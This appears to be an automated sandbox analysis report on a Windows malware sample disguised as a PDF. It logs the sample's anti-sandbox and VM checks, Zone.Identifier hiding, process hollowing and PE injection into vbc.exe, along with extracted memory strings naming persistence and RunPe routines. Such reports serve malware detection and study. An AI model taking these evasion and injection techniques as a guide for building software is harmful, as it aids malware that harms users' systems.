              Source: ORDER-NEW....pdf.exeStatic PE information: section name:
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004443B0
              Source: initial sampleStatic PE information: section name: )xrUhX entropy: 7.99978046274

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeFile opened: C:\Users\user\Desktop\ORDER-NEW....pdf.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00443A61
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5892Thread sleep count: 146 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5892Thread sleep time: -146000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7164Thread sleep count: 134 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7164Thread sleep time: -134000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040978A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0041829C memset,GetSystemInfo,8_2_0041829C
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,8_2_0040938F
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,8_2_00408CAC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,18_2_0040702D
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmpBinary or memory string: virtualMachine
              Source: Amcache.hve.9.drBinary or memory string: VMware
              Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: Amcache.hve.9.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.9.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
              Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
              Source: bhvF129.tmp.8.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20220121T000947Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=222178a1e1114cf5ab744bb5c0e1dbd6&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1351077&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1351077&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmpBinary or memory string: ValueTypeDecryptionFileUnblockerVirtualMachineGetVmSInstallClassKnownFolderFlagsEnumKfKnownFolder<>c__DisplayClass1_0<>cProgramRrRunPersistenceSafeNativeMethodsStartClassStartupShortcutResourcesFm.PropertiesSettingsApplicationSettingsBaseSystem.ConfigurationIWshShellFm.IWshRuntimeLibraryIWshShell2IWshShell3IWshShortcutWshShell__StaticArrayInitTypeSize=16<PrivateImplementationDetails>
              Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.9.drBinary or memory string: VMware7,1
              Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.me
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmpBinary or memory string: .cctorGetFolderPath2installFolderGetInstallFolderGetSpecialFolderfolder.ctorByteArrayToStringdataMd5HashDataSaveDatafileNameAdataAWatpathtxtAzpackageCountdicoptionsCompressNewMethodSomnisormillisecondsWobjectmethodInvokevalueBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresultEFList`1listbinaryReaderDecryptplainBytespassPhraseUnblockPathUnblockFilefileNameDetectVmvirtualMachineSandieget_Hostset_Hostget_MachineNameset_MachineNamehostmachineNameTryInstallexecPathinstallPathstartupFolderkeyNamevalueNameoptionsDelayTimeCmdCopyoriginalPathnewPathGetPathknownFolderdefaultUserGetDefaultPathInitializeflagsSetPathkeyMain<.cctor>b__1rn<.cctor>b__1_0senderbargsImgTDataimagesReadMResNewStringBuilderlongnumberseedSignalnameTryClaimmutexWaittimeoutMonitorSpawnlingstateReclaimMutexBeginMonitorSpawnlingprocessSpawnNewProcessBeginReclaimMutexWaitForCloseSignalBeginWaitForCloseSignalCloseSiblingsDeleteFilekernel32ShGetFhwndOwnernFolderhTokendwFlagspszPathSHGetFolderPathshell32.dllShGetrfidppszPathSHGetKnownFolderPathShell32.dllShSetSHSetKnownFolderPathGetMdlpModuleNameGetModuleHandlekernel32.dllComputeGetTimeStampDicIList`1parametersGetHostPathindexdefaultPathLocalPathStartFilefilemodeYinstalFolderInstallFolderCompareFileSizesf1f2SrkDecompressMphparamMrgRunPe1newpathbytearrayBytesexePathCssget_ResourceManagerget_Cultureset_Cultureget_clsRPget_Default_VtblGap1_4CreateShortcutPathLinkget_FullName_VtblGap1_9get_TargetPathset_TargetPath_VtblGap2_2get_WorkingDirectoryset_WorkingDirectory_VtblGap3_1iCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerTypeSetProcessWorkingSetSizeEventArgsAttachAppGetstringIDHostMachineNameCultureDefaultFullNameTargetPathWorkingDirectoryAssemblyDescriptionAttributeAssemblyConfigurationAttributeAssemblyCompanyAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyTitleAttributeComVisibleAttributeTargetFrameworkAttributeSystem.Runtime.VersioningGuidAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeSuppressIldasmAttributeFlagsAttributeCompilerGeneratedAttributeGeneratedCodeAttributeSystem.CodeDom.CompilerDebuggerNonUserCodeAttributeTypeIdentifierAttributeDefaultMemberAttributeCoClassAttributeAttributeUsageAttributeAttributeTargetsSTAThreadAttributeDispIdAttributeEditorBrowsableAttributeSystem.ComponentModelEditorBrowsableStateFm.Properties.Resources.resourcesFm.Resources.clsRP.xlgCharInt32IntPtrZeroEmptyMD5CryptoServiceProviderExceptionget_ItemReadAllBytesContainsProcessIdStreamReaderBooleanAddByteDoubleInt64SByteInt16SingleUInt32UInt64UInt16ReadBytesRijndaelManagedCryptoStreamModeIEquatable`1RegistryLocalMachineExternalExceptionFunc`2System.CoreEnumerableSystem.LinqFirstOrDefaultIEnumerable`1ArgumentExceptionPointInvalidOperationExceptionLastEventResetModeParameterizedThreadStartThreadStartICollection`1get_CountCurrentUserDeflateStreamSystem.IO.CompressionCompressionModeResolveTypeHandleGetFieldsFieldInfoBindingFlagsget_CharsResolveMethodHandl
              Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmpBinary or memory string: VirtualMachine
              Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040978A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004443B0
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156Jump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sample uses process hollowing technique
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3AB008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 291008Jump to behavior
              .NET source code references suspicious native API functions
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Allocates memory in foreign processes
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
